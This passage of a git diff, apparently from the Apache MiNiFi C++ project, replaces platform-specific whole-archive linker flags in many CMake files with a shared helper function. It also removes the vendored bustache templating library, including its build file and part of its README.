-	    target_link_libraries (${testfilename} -Wl,--whole-archive minifi-rdkafka-extensions -Wl,--no-whole-archive)
-	endif ()
+	target_wholearchive_library(${testfilename} minifi-rdkafka-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	MATH(EXPR EXTENSIONS_TEST_COUNT "${EXTENSIONS_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
diff --git a/libminifi/test/mqtt-tests/CMakeLists.txt b/libminifi/test/mqtt-tests/CMakeLists.txt
index 1e465b1..3b0d482 100644
--- a/libminifi/test/mqtt-tests/CMakeLists.txt
+++ b/libminifi/test/mqtt-tests/CMakeLists.txt
@@ -28,11 +28,8 @@
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/librdkafka-0.11.1/src-cpp")
 	createTests("${testfilename}")
 	target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
-	if (APPLE)
-	      target_link_libraries (${testfilename} -Wl,-all_load minifi-rdkafka-extensions)
-	else ()
-	    target_link_libraries (${testfilename} -Wl,--whole-archive minifi-rdkafka-extensions -Wl,--no-whole-archive)
-	endif ()
+	target_wholearchive_library(${testfilename} minifi-mqtt-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	MATH(EXPR EXTENSIONS_TEST_COUNT "${EXTENSIONS_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
diff --git a/libminifi/test/pcap-tests/CMakeLists.txt b/libminifi/test/pcap-tests/CMakeLists.txt
index f66333c..8af7084 100644
--- a/libminifi/test/pcap-tests/CMakeLists.txt
+++ b/libminifi/test/pcap-tests/CMakeLists.txt
@@ -28,11 +28,8 @@
   	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/pcap/")
   	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_BINARY_DIR}/extensions/pcap/pcap++/Dist/header/")
     createTests("${testfilename}")
-    if(APPLE)    
-        target_link_libraries ("${testfilename}" -Wl,-all_load minifi-pcap minifi-standard-processors)
-	else()
-        target_link_libraries ("${testfilename}" -Wl,--whole-archive minifi-pcap minifi-standard-processors -Wl,--no-whole-archive)
-  	endif()
+    target_wholearchive_library(${testfilename} minifi-pcap)
+    target_wholearchive_library(${testfilename} minifi-standard-processors)
   MATH(EXPR PCAP_INT_TEST_COUNT "${PCAP_INT_TEST_COUNT}+1")
 ENDFOREACH()
 
diff --git a/libminifi/test/rocksdb-tests/CMakeLists.txt b/libminifi/test/rocksdb-tests/CMakeLists.txt
index 96c9fd7..67b4a46 100644
--- a/libminifi/test/rocksdb-tests/CMakeLists.txt
+++ b/libminifi/test/rocksdb-tests/CMakeLists.txt
@@ -26,11 +26,8 @@
   	target_include_directories(${testfilename} BEFORE PRIVATE "${ROCKSDB_THIRDPARTY_ROOT}/include")
 	createTests("${testfilename}")	
 	target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
-  	if (APPLE)
-		target_link_libraries (${testfilename} -Wl,-all_load minifi-rocksdb-repos)
-	else ()
-	  	target_link_libraries (${testfilename} -Wl,--whole-archive minifi-rocksdb-repos -Wl,--no-whole-archive)
-	endif ()
+	target_wholearchive_library(${testfilename} minifi-rocksdb-repos)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	MATH(EXPR ROCKSDB_TEST_COUNT "${ROCKSDB_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
diff --git a/libminifi/test/script-tests/CMakeLists.txt b/libminifi/test/script-tests/CMakeLists.txt
index b2311ed..5ac0314 100644
--- a/libminifi/test/script-tests/CMakeLists.txt
+++ b/libminifi/test/script-tests/CMakeLists.txt
@@ -35,11 +35,8 @@
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/script/python")
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/thirdparty/pybind11/include")
 	add_definitions(-DPYTHON_SUPPORT)
-	if (APPLE)
-		target_link_libraries ("${testfilename}" -Wl,-all_load ${ZLIB_LIBRARIES} minifi-script-extensions minifi-standard-processors )
-	else ()
-		target_link_libraries ("${testfilename}" -Wl,--whole-archive ${ZLIB_LIBRARIES}  minifi-script-extensions minifi-standard-processors -Wl,--no-whole-archive)
-	endif()
+	target_wholearchive_library(${testfilename} minifi-script-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	createTests("${testfilename}")
 	MATH(EXPR EXTENSIONS_TEST_COUNT "${EXTENSIONS_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
@@ -53,11 +50,8 @@
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/script/lua")
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/thirdparty/sol2-2.17.5")
 	add_definitions(-DLUA_SUPPORT)
-	if (APPLE)
-		target_link_libraries ("${testfilename}"  -Wl,-all_load ${ZLIB_LIBRARIES} minifi-script-extensions )
-	else ()
-		target_link_libraries ("${testfilename}" -Wl,--whole-archive ${ZLIB_LIBRARIES}  minifi-script-extensions minifi-standard-processors -Wl,--no-whole-archive)
-	endif()
+	target_wholearchive_library(${testfilename} minifi-script-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	createTests("${testfilename}")
 	MATH(EXPR EXTENSIONS_TEST_COUNT "${EXTENSIONS_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
diff --git a/libminifi/test/sensors-tests/CMakeLists.txt b/libminifi/test/sensors-tests/CMakeLists.txt
index 767fd57..8f99d79 100644
--- a/libminifi/test/sensors-tests/CMakeLists.txt
+++ b/libminifi/test/sensors-tests/CMakeLists.txt
@@ -29,12 +29,10 @@
   	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/sensors/")
   	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_BINARY_DIR}/extensions/sensors/")
     createTests("${testfilename}")
-    if(APPLE)    
-    	target_link_libraries ("${testfilename}" -Wl,-all_load minifi-sensors )
-	else()
-  		target_link_libraries ("${testfilename}" -Wl,--whole-archive minifi-sensors -Wl,--no-whole-archive)
-  	endif()
-  MATH(EXPR SENSORS_INT_TEST_COUNT "${SENSORS_INT_TEST_COUNT}+1")
+	target_wholearchive_library(${testfilename} minifi-sensors)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
+
+    MATH(EXPR SENSORS_INT_TEST_COUNT "${SENSORS_INT_TEST_COUNT}+1")
 ENDFOREACH()
 
 message("-- Finished building ${SENSORS_INT_TEST_COUNT} sensor(s) test file(s)...")
diff --git a/libminifi/test/sqlite-tests/CMakeLists.txt b/libminifi/test/sqlite-tests/CMakeLists.txt
index c039101..939246c 100644
--- a/libminifi/test/sqlite-tests/CMakeLists.txt
+++ b/libminifi/test/sqlite-tests/CMakeLists.txt
@@ -27,11 +27,8 @@
   target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/sqlite")
   target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/thirdparty/sqlite")
 
-  if (APPLE)
-    target_link_libraries (${testfilename} -Wl,-all_load minifi-sqlite-extensions minifi-standard-processors)
-  else ()
-    target_link_libraries (${testfilename} -Wl,--whole-archive minifi-sqlite-extensions minifi-standard-processors -Wl,--no-whole-archive)
-  endif ()
+  target_wholearchive_library(${testfilename} minifi-sqlite-extensions)
+  target_wholearchive_library(${testfilename} minifi-standard-processors)
 
   createTests("${testfilename}")
   target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
diff --git a/libminifi/test/tensorflow-tests/CMakeLists.txt b/libminifi/test/tensorflow-tests/CMakeLists.txt
index 906b325..c7e68eb 100644
--- a/libminifi/test/tensorflow-tests/CMakeLists.txt
+++ b/libminifi/test/tensorflow-tests/CMakeLists.txt
@@ -24,16 +24,13 @@
 SET(EXTENSIONS_TEST_COUNT 0)
 FOREACH(testfile ${TENSORFLOW_INTEGRATION_TESTS})
 	get_filename_component(testfilename "${testfile}" NAME_WE)
-	add_executable("${testfilename}" "${testfile}" ${SPD_SOURCES} "${TEST_DIR}/TestBase.cpp")
+	add_executable("${testfilename}" "${testfile}" "${TEST_DIR}/TestBase.cpp")
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/tensorflow")
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/standard-processors")
 	target_include_directories(${testfilename} PRIVATE BEFORE ${TENSORFLOW_INCLUDE_DIRS})
 	createTests("${testfilename}")
-	if (APPLE)
-		target_link_libraries (${testfilename} -Wl,-all_load minifi-tensorflow-extensions)
-	else ()
-	    target_link_libraries (${testfilename} -Wl,--whole-archive minifi-tensorflow-extensions minifi-standard-processors -Wl,--no-whole-archive)
-	endif ()
+	target_wholearchive_library(${testfilename} minifi-tensorflow-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	MATH(EXPR EXTENSIONS_TEST_COUNT "${EXTENSIONS_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
diff --git a/libminifi/test/usb-camera-tests/CMakeLists.txt b/libminifi/test/usb-camera-tests/CMakeLists.txt
index c00b300..242131c 100644
--- a/libminifi/test/usb-camera-tests/CMakeLists.txt
+++ b/libminifi/test/usb-camera-tests/CMakeLists.txt
@@ -22,15 +22,12 @@
 SET(EXTENSIONS_TEST_COUNT 0)
 FOREACH(testfile ${USB_CAMERA_INTEGRATION_TESTS})
 	get_filename_component(testfilename "${testfile}" NAME_WE)
-	add_executable("${testfilename}" "${testfile}" ${SPD_SOURCES} "${TEST_DIR}/TestBase.cpp")
+	add_executable("${testfilename}" "${testfile}" "${TEST_DIR}/TestBase.cpp")
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/usb-camera")
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/thirdparty/libuvc-0.0.6/include")
 	createTests("${testfilename}")
-	if (APPLE)
-	      target_link_libraries (${testfilename} -Wl,-all_load minifi-usb-camera-extensions)
-	else ()
-	    target_link_libraries (${testfilename} -Wl,--whole-archive minifi-usb-camera-extensions -Wl,--no-whole-archive)
-	endif ()
+	target_wholearchive_library(${testfilename} minifi-usb-camera-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	MATH(EXPR EXTENSIONS_TEST_COUNT "${EXTENSIONS_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
diff --git a/main/CMakeLists.txt b/main/CMakeLists.txt
index 3634bf0..ef0eaf3 100644
--- a/main/CMakeLists.txt
+++ b/main/CMakeLists.txt
@@ -23,8 +23,7 @@
   CMAKE_POLICY(SET CMP0048 OLD)
 ENDIF(POLICY CMP0048)
 
-include_directories(../libminifi/include ../thirdparty/cron ../thirdparty/spdlog-20170710/include ../thirdparty/concurrentqueue ../thirdparty/yaml-cpp-yaml-cpp-20171024/include ../thirdparty/rapidjson-1.1.0/include ../thirdparty/)
-include_directories(${JEMALLOC_INCLUDE_DIRS})
+include_directories(../libminifi/include)
 
 if(WIN32)
 	add_definitions(-DWIN32_LEAN_AND_MEAN)
@@ -69,47 +68,13 @@
   target_link_libraries(minifiexe "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-set (WIN32_ARCHIVES "")
+target_wholearchive_library(minifiexe core-minifi)
+target_wholearchive_library(minifiexe minifi)
 
-# Link against minifi, yaml-cpp, civetweb-cpp, uuid, openssl, and rocksdb
-#target_link_libraries(minifiexe core-minifi)
-
-if (APPLE)
-	target_link_libraries (minifiexe -Wl,-all_load core-minifi)
-elseif(NOT WIN32)
-	target_link_libraries (minifiexe -Wl,--whole-archive core-minifi -Wl,--no-whole-archive)
-else()
-	#target_link_libraries (minifiexe core-minifi)
-	set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:core-minifi")
-#	set_target_properties(minifiexe PROPERTIES LINK_FLAGS "/WHOLEARCHIVE:core-minifi")
-endif ()
-
-# Include OpenSSL
-if (OPENSSL_FOUND)
-	if (APPLE)
-		target_link_libraries(minifiexe -Wl,-all_load ${OPENSSL_LIBRARIES})
-	elseif(NOT WIN32)
-		target_link_libraries(minifiexe -Wl,--whole-archive ${OPENSSL_LIBRARIES} -Wl,--no-whole-archive)
-	else()
-	target_link_libraries(minifiexe ${OPENSSL_LIBRARIES})
-	endif()
-	include_directories(${OPENSSL_INCLUDE_DIR})
-endif(OPENSSL_FOUND)
-
-add_dependencies(minifiexe minifi)
-
-
-if (APPLE)
-	target_link_libraries (minifiexe -Wl,-all_load minifi)
-elseif(NOT WIN32)
-	target_link_libraries (minifiexe -Wl,--whole-archive minifi -Wl,--no-whole-archive)
-else()
-	target_link_libraries (minifiexe minifi)
-	set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:minifi")
-	#set_target_properties(minifiexe PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:minifi")
-endif ()
-
-target_link_libraries(minifiexe yaml-cpp ${JEMALLOC_LIBRARIES}) #
+target_link_libraries(minifiexe yaml-cpp)
+if(NOT WIN32 AND ENABLE_JNI AND NOT DISABLE_JEMALLOC)
+	target_link_libraries(minifiexe JeMalloc::JeMalloc)
+endif()
 
 if (WIN32)
 	include_directories("../thirdparty/Simple-Windows-Posix-Semaphore")
@@ -123,34 +88,13 @@
 	endif(LIBC_STATIC)
 endif(NOT USE_SHARED_LIBS)
 
-if (APPLE)
-	get_property(extensions GLOBAL PROPERTY EXTENSION-OPTIONS)
-	foreach(EXTENSION ${extensions})
-		message("Linking MiNiFiMain against ${EXTENSION}")
-		target_link_libraries (minifiexe -Wl,-all_load ${EXTENSION})
-		add_dependencies(minifiexe ${EXTENSION})
-	endforeach()    
-else ()
-	get_property(extensions GLOBAL PROPERTY EXTENSION-OPTIONS)
-	foreach(EXTENSION ${extensions})
-	if (WIN32)
-	target_link_libraries (minifiexe ${EXTENSION})
-	  set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:${EXTENSION}")
-	  add_dependencies(minifiexe ${EXTENSION})
-    else()
-	  target_link_libraries (minifiexe -Wl,--whole-archive ${EXTENSION} -Wl,--no-whole-archive)
-	  add_dependencies(minifiexe ${EXTENSION})
-	  endif()
-	endforeach()
-endif ()
+get_property(extensions GLOBAL PROPERTY EXTENSION-OPTIONS)
+foreach(EXTENSION ${extensions})
+	message("Linking MiNiFiMain against ${EXTENSION}")
+	target_wholearchive_library(minifiexe ${EXTENSION})
+endforeach()
 
-if(WIN32)
-	set_target_properties(minifiexe PROPERTIES LINK_FLAGS "${LINK_FLAGS} ${WIN32_ARCHIVES}")
-endif()
-set_target_properties(minifiexe
-        PROPERTIES OUTPUT_NAME minifi)
-
-               
+set_target_properties(minifiexe PROPERTIES OUTPUT_NAME minifi)
 
 if (NOT WIN32)
 add_custom_command(TARGET minifiexe POST_BUILD
diff --git a/nanofi/CMakeLists.txt b/nanofi/CMakeLists.txt
index 7110519..a941676 100644
--- a/nanofi/CMakeLists.txt
+++ b/nanofi/CMakeLists.txt
@@ -24,8 +24,7 @@
 ENDIF(POLICY CMP0048)
 
 include_directories(include)
-include_directories(../libminifi/include ../thirdparty/cron ../thirdparty/spdlog-20170710/include)
-include_directories(../thirdparty/ut)
+include_directories(../libminifi/include)
 
 if(WIN32)
 include_directories(../libminifi/opsys/win)
@@ -65,42 +64,23 @@
 
 add_library(nanofi STATIC ${NANOFI_SOURCES})
 
-if (APPLE)
-	target_link_libraries (nanofi -Wl,-all_load core-minifi minifi minifi-standard-processors)
-elseif(NOT WIN32)
-	target_link_libraries (nanofi -Wl,--whole-archive core-minifi minifi minifi-standard-processors -Wl,--no-whole-archive)
-else()
-    set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:core-minifi")
-	set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:minifi")
-	set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:minifi-standard-processors")
-endif ()
+target_link_libraries(nanofi spdlog ut)
+target_wholearchive_library(nanofi core-minifi)
+target_wholearchive_library(nanofi minifi)
+target_wholearchive_library(nanofi minifi-standard-processors)
 
-add_dependencies(nanofi minifi-standard-processors)
-
-if(WIN32)
-	set_target_properties(nanofi PROPERTIES LINK_FLAGS "${WIN32_ARCHIVES}")
-endif()
 
 if (ENABLE_PYTHON AND NOT STATIC_BUILD)
 
 add_library(nanofi-shared SHARED ${NANOFI_SOURCES})
 
-if (APPLE)
-	target_link_libraries (nanofi-shared -Wl,-all_load core-minifi-shared minifi-shared minifi-standard-processors)
-elseif(NOT WIN32)
-	target_link_libraries (nanofi-shared -Wl,--whole-archive core-minifi-shared minifi-shared  minifi-standard-processors -Wl,--no-whole-archive)
-else()
-    set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:core-minifi-shared")
-	set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:minifi-shared")
-	set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:minifi-standard-processors")
-endif ()
+target_link_libraries(nanofi-shared spdlog ut)
+target_wholearchive_library(nanofi-shared core-minifi-shared)
+target_wholearchive_library(nanofi-shared minifi-shared)
+target_wholearchive_library(nanofi-shared minifi-standard-processors)
 
 add_dependencies(nanofi-shared minifi-standard-processors)
 
-if(WIN32)
-	set_target_properties(nanofi-shared PROPERTIES LINK_FLAGS "${WIN32_ARCHIVES}")
-endif()
-
 set_property(TARGET nanofi-shared PROPERTY POSITION_INDEPENDENT_CODE ON)
 
 endif(ENABLE_PYTHON AND NOT STATIC_BUILD)
diff --git a/nanofi/ecu/CMakeLists.txt b/nanofi/ecu/CMakeLists.txt
index fccb443..9c9e314 100644
--- a/nanofi/ecu/CMakeLists.txt
+++ b/nanofi/ecu/CMakeLists.txt
@@ -19,26 +19,17 @@
 
 cmake_minimum_required(VERSION 2.6)
 
-if (APPLE)
-    set(LINK_FLAGS "-Wl,-all_load")
-    set(LINK_END_FLAGS "")
-elseif (UNIX)
-    set(LINK_FLAGS "-Wl,--whole-archive")
-    set(LINK_END_FLAGS "")
-endif ()
 
 if (NOT WIN32)
-
 add_executable(log_aggregator log_aggregator.c)
-
-target_link_libraries(log_aggregator nanofi ${CMAKE_THREAD_LIBS_INIT}  ${LINK_FLAGS} minifi-http-curl ${LINK_END_FLAGS})
+target_link_libraries(log_aggregator nanofi ${CMAKE_THREAD_LIBS_INIT})
+target_wholearchive_library(log_aggregator minifi-http-curl)
 
 add_executable(tailfile_chunk tailfile_chunk.c)
-
-target_link_libraries(tailfile_chunk nanofi ${CMAKE_THREAD_LIBS_INIT}  ${LINK_FLAGS} minifi-http-curl ${LINK_END_FLAGS})
+target_link_libraries(tailfile_chunk nanofi ${CMAKE_THREAD_LIBS_INIT})
+target_wholearchive_library(tailfile_chunk minifi-http-curl)
 
 add_executable(tailfile_delimited tailfile_delimited.c)
-
-target_link_libraries(tailfile_delimited nanofi ${CMAKE_THREAD_LIBS_INIT}  ${LINK_FLAGS} minifi-http-curl ${LINK_END_FLAGS})
-
-endif()
\ No newline at end of file
+target_link_libraries(tailfile_delimited nanofi ${CMAKE_THREAD_LIBS_INIT})
+target_wholearchive_library(tailfile_delimited minifi-http-curl)
+endif()
diff --git a/nanofi/examples/CMakeLists.txt b/nanofi/examples/CMakeLists.txt
index 6a9779c..fa1be9f 100644
--- a/nanofi/examples/CMakeLists.txt
+++ b/nanofi/examples/CMakeLists.txt
@@ -46,24 +46,14 @@
 
 endif()
 
-if (WIN32)
-    set(LINK_FLAGS "/WHOLEARCHIVE")
-    set(LINK_END_FLAGS "")
-elseif (APPLE)
-    set(LINK_FLAGS "-Wl,-all_load")
-    set(LINK_END_FLAGS "")
-else ()
-    set(LINK_FLAGS "-Wl,--whole-archive")
-    set(LINK_END_FLAGS "")
-endif ()
-
 if (NOT WIN32)
 
 add_executable(generate_flow generate_flow.c)
 
 add_executable(terminate_handler terminate_handler.c)
 
-target_link_libraries(generate_flow nanofi ${CMAKE_THREAD_LIBS_INIT} ${LINK_FLAGS} minifi-http-curl ${LINK_END_FLAGS})
+target_wholearchive_library(generate_flow minifi-http-curl)
+target_link_libraries(generate_flow nanofi ${CMAKE_THREAD_LIBS_INIT})
 
 target_link_libraries(terminate_handler nanofi ${CMAKE_THREAD_LIBS_INIT} )
 
@@ -73,14 +63,17 @@
 
 add_executable(transmit_flow transmit_flow.c)
 
-target_link_libraries(transmit_flow nanofi ${CMAKE_THREAD_LIBS_INIT}  ${LINK_FLAGS} minifi-http-curl ${LINK_END_FLAGS})
+target_wholearchive_library(transmit_flow minifi-http-curl)
+target_link_libraries(transmit_flow nanofi ${CMAKE_THREAD_LIBS_INIT})
 
 add_executable(transmit_payload transmit_payload.c)
 
-target_link_libraries(transmit_payload nanofi ${CMAKE_THREAD_LIBS_INIT}  ${LINK_FLAGS} minifi-http-curl ${LINK_END_FLAGS})
+target_wholearchive_library(transmit_payload minifi-http-curl)
+target_link_libraries(transmit_payload nanofi ${CMAKE_THREAD_LIBS_INIT})
 
 add_executable(monitor_directory monitor_directory.c)
 
-target_link_libraries(monitor_directory nanofi ${CMAKE_THREAD_LIBS_INIT}  ${LINK_FLAGS} minifi-http-curl ${LINK_END_FLAGS})
+target_wholearchive_library(monitor_directory minifi-http-curl)
+target_link_libraries(monitor_directory nanofi ${CMAKE_THREAD_LIBS_INIT})
 
 endif()
diff --git a/python/library/CMakeLists.txt b/python/library/CMakeLists.txt
index 684cf22..4a94271 100644
--- a/python/library/CMakeLists.txt
+++ b/python/library/CMakeLists.txt
@@ -23,7 +23,7 @@
   CMAKE_POLICY(SET CMP0048 OLD)
 ENDIF(POLICY CMP0048)
 
-include_directories(../../nanofi/include/ ../../libminifi/include  ../../libminifi/include/c2  ../../libminifi/include/c2/protocols/  ../../libminifi/include/core/state ./libminifi/include/core/statemanagement/metrics  ../../libminifi/include/core/yaml  ../../libminifi/include/core  ../../thirdparty/spdlog-20170710/include ../../thirdparty/concurrentqueue ../../thirdparty/yaml-cpp-yaml-cpp-20171024/include ../../thirdparty/civetweb-1.9.1/include ../../thirdparty/)
+include_directories(../../nanofi/include/ ../../libminifi/include  ../../libminifi/include/c2  ../../libminifi/include/c2/protocols/  ../../libminifi/include/core/state ./libminifi/include/core/statemanagement/metrics  ../../libminifi/include/core/yaml  ../../libminifi/include/core ../../thirdparty/)
 if(WIN32)
 	include_directories(../../libminifi/opsys/win)
 else()
@@ -38,13 +38,4 @@
 	target_link_libraries(python-lib nanofi-shared core-minifi-shared minifi-shared)
 endif(APPLE)
 
-if (WIN32)
-target_link_libraries(python-lib ${CURL_LIBRARY}  minifi-http-curl)
-    set_target_properties(python-lib PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE:minifi-http-curl"
-    )
-elseif (APPLE)
-	target_link_libraries(python-lib ${CURL_LIBRARY}  -Wl,-all_load minifi-http-curl)
-else ()
-	target_link_libraries(python-lib -Wl,--whole-archive minifi-http-curl -Wl,--no-whole-archive ${CURL_LIBRARY} )
-endif ()
\ No newline at end of file
+target_wholearchive_library(python-lib minifi-http-curl)
diff --git a/thirdparty/bustache/CMakeLists.txt b/thirdparty/bustache/CMakeLists.txt
deleted file mode 100644
index 0fefa02..0000000
--- a/thirdparty/bustache/CMakeLists.txt
+++ /dev/null
@@ -1,64 +0,0 @@
-cmake_minimum_required(VERSION 3.2 FATAL_ERROR)
-
-#set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} )
-list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/Modules/")
-
-project(bustache VERSION 1.0.0 LANGUAGES CXX)
-
-option(BUSTACHE_ENABLE_TESTING "Enable testing of the bustache library." OFF)
-
-# Set the default CMAKE_BUILD_TYPE to Release.
-# This should be done before the project command since the latter can set
-# CMAKE_BUILD_TYPE itself (it does so for nmake).
-if (NOT CMAKE_BUILD_TYPE)
-  set(CMAKE_BUILD_TYPE Release CACHE STRING
-    "Choose the type of build, options are: None(CMAKE_CXX_FLAGS or CMAKE_C_FLAGS used) Debug Release RelWithDebInfo MinSizeRel.")
-endif()
-
-add_library(${PROJECT_NAME}
-    src/format.cpp
-    src/generate.cpp
-)
-
-find_package(Boost REQUIRED)
-
-# Define headers for this library. PUBLIC headers are used for
-# compiling the library, and will be added to consumers' build
-# paths.
-target_include_directories(${PROJECT_NAME}
-    PUBLIC
-        include
-        ${Boost_INCLUDE_DIR}
-)
-
-# If we have compiler requirements for this library, list them here
-# target_compile_features(${PROJECT_NAME}
-#     PUBLIC
-#         cxx_alias_templates
-#         cxx_auto_type
-#         cxx_decltype_auto
-#         cxx_user_literals
-#         cxx_rvalue_references
-#         cxx_range_for
-#         cxx_nullptr
-#         cxx_noexcept
-#         cxx_inline_namespaces
-# )
-
-set_target_properties(${PROJECT_NAME} PROPERTIES
-    CXX_STANDARD 11
-)
-
-# 'make install' to the correct location
-install(TARGETS ${PROJECT_NAME}
-    ARCHIVE  DESTINATION lib
-    LIBRARY  DESTINATION lib
-    RUNTIME  DESTINATION bin  # This is for Windows
-)
-
-install(DIRECTORY include/ DESTINATION include)
-
-if (BUSTACHE_ENABLE_TESTING)
-    enable_testing()
-    add_subdirectory(test)
-endif()
diff --git a/thirdparty/bustache/README.md b/thirdparty/bustache/README.md
deleted file mode 100644
index d453a04..0000000
--- a/thirdparty/bustache/README.md
+++ /dev/null
@@ -1,267 +0,0 @@
-{{ bustache }} [![Try it online][badge.wandbox]](https://wandbox.org/permlink/Vxmrb2GgcLKicC7N)
-========
-
-C++11 implementation of [{{ mustache }}](http://mustache.github.io/), compliant with [spec](https://github.com/mustache/spec) v1.1.3.
-
-## Dependencies
-* [Boost](http://www.boost.org/) - for `unordered_map`, etc
-
-### Optional Dependencies
-* [Google.Benchmark](https://github.com/google/benchmark) - for benchmark
-* [Catch](https://github.com/philsquared/Catch) - for test
-
-## Supported Features
-* Variables
-* Sections
-* Inverted Sections
-* Comments
-* Partials
-* Set Delimiter
-* Lambdas
-* HTML escaping *(configurable)*
-* Template inheritance *(extension)*
-
-## Basics
-{{ mustache }} is a template language for text-replacing.
-When it comes to formatting, there are 2 essential things -- _Format_ and _Data_.
-{{ mustache }} also allows an extra lookup-context for _Partials_.
-In {{ bustache }}, we represent the _Format_ as a `bustache::format` object, and `bustache::object` for _Data_, and anything that provides interface that is compatible with `Map<std::string, bustache::format>` can be used for _Partials_.
-The _Format_ is orthogonal to the _Data_, so techincally you can use your custom _Data_ type with `bustache::format`, but then you have to write the formatting logic yourself.
-
-### Quick Example
-```c++
-bustache::format format{"{{mustache}} templating"};
-bustache::object data{{"mustache", "bustache"}};
-std::cout << format(data); // should print "bustache templating"
-```
-
-## Manual
-
-### Data Model
-It's basically the JSON Data Model represented in C++, with some extensions.
-
-#### Header
-`#include <bustache/model.hpp>`
-
-#### Synopsis
-```c++
-using array = std::vector<value>;
-using object = boost::unordered_map<std::string, value>;
-using lambda0v = std::function<value()>;
-using lambda0f = std::function<format()>;
-using lambda1v = std::function<value(ast::content_list const&)>;
-using lambda1f = std::function<format(ast::content_list const&)>;
-
-class value =
-    variant
-    <
-        std::nullptr_t
-      , bool
-      , int
-      , double
-      , std::string
-      , array
-      , lambda0v
-      , lambda0f
-      , lambda1v
-      , lambda1f
-      , object
-    >;
-```
-### Format Object
-`bustache::format` parses in-memory string into AST.
-
-#### Header
-`#include <bustache/format.hpp>`
-
-#### Synopsis
-*Constructors*
-```c++
-format(char const* begin, char const* end); // [1]
-
-template<std::size_t N>
-explicit format(char const (&source)[N]); // [2]
-
-template<class Source>
-explicit format(Source const& source); // [3]
-
-template <typename Source>
-explicit format(Source const&& source); // [4]
-
-explicit format(ast::content_list contents, bool copytext = true); // [5]
-```
-* `Source` is an object that represents continous memory, like `std::string`, `std::vector<char>` or `boost::iostreams::mapped_file_source` that provides access to raw memory through `source.data()` and `source.size()`.
-* Version 2 allows implicit conversion from literal.
-* Version 1~3 doesn't hold the text, you must ensure the memory referenced is valid and not modified at the use of the format object.
-* Version 4 copies the necessary text into its internal buffer, so there's no lifetime issue.
-* Version 5 takes a `ast::content_list`, if `copytext == true` the text will be copied into the internal buffer.
-
-*Manipulator*
-```c++
-template <typename T>
-manipulator<T, no_context>
-operator()(T const& data, option_type flag = normal) const;
-
-template <typename T, typename Context>
-manipulator<T, Context>
-operator()(T const& data, Context const& context, option_type flag = normal) const;
-```
-* `Context` is any associative container `Map<std::string, bustache::format>`, which is referenced by _Partials_.
-* `option_type` provides 2 options: `normal` and `escape_html`, if `normal` is chosen, there's no difference between `{{Tag}}` and `{{{Tag}}}`, the text won't be escaped in both cases.
-
-### Stream-based Output
-Output directly to the `std::basic_ostream`.
-
-#### Synopsis
-```c++
-// in <bustache/model.hpp>
-template<class CharT, class Traits, class T, class Context,
-    std::enable_if_t<std::is_constructible<value::view, T>::value, bool> = true>
